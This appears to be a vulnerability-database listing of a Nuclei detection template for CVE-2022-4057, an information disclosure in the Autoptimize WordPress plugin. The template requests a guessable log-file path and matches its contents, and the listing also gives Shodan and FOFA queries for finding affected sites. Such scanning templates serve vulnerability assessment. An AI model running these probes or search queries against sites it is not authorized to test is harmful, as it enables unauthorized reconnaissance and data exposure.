Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-4057
HistoryJul 12, 2023 - 9:11 a.m.

Autoptimize < 3.1.0 - Information Disclosure

2023-07-1209:11:58
ProjectDiscovery
github.com
3
cve
cve2022
wpscan
wordpress
wp-plugin
disclosure
autoptimize
optimizingmatters
information
guessable
settings
logs
vulnerability
upgrade

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.002 Low

EPSS

Percentile

55.8%

The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.
id: CVE-2022-4057

info:
  name: Autoptimize < 3.1.0 - Information Disclosure
  author: DhiyaneshDK
  severity: medium
  description: |
    The Autoptimize WordPress plugin before 3.1.0 uses an easily guessable path to store plugin's exported settings and logs.
  impact: |
    An attacker can gain access to sensitive information, potentially leading to further attacks.
  remediation: |
    Upgrade to Autoptimize version 3.1.0 or later to fix the information disclosure vulnerability.
  reference:
    - https://wpscan.com/vulnerability/95ee1b9c-1971-4c35-8527-5764e9ed64af
    - https://wordpress.org/plugins/autoptimize/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4057
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-4057
    cwe-id: CWE-425
    epss-score: 0.00125
    epss-percentile: 0.46949
    cpe: cpe:2.3:a:optimizingmatters:autooptimize:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: optimizingmatters
    product: autooptimize
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/autoptimize
    fofa-query: body=/wp-content/plugins/autoptimize
    publicwww-query: /wp-content/plugins/autoptimize
  tags: cve,cve2022,wpscan,wp,wordpress,wp-plugin,disclosure,autoptimize,optimizingmatters

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/uploads/ao_ccss/queuelog.html"
      - "{{BaseURL}}/blog/wp-content/uploads/ao_ccss/queuelog.html"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Job id &lt;'
          - 'log messages'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205fec4c58b267b8105cb2a3409a6690b17ea32caef1278c19456a16fbe975222c022100a505b11aa75ef278330e087760b9a806b221d7f3a1cc9d7c6b8aafaa42e136e4:922c64590222798bb761d5b6d8e72950

5.3 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

LOW

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

0.002 Low

EPSS

Percentile

55.8%

Related for NUCLEI:CVE-2022-4057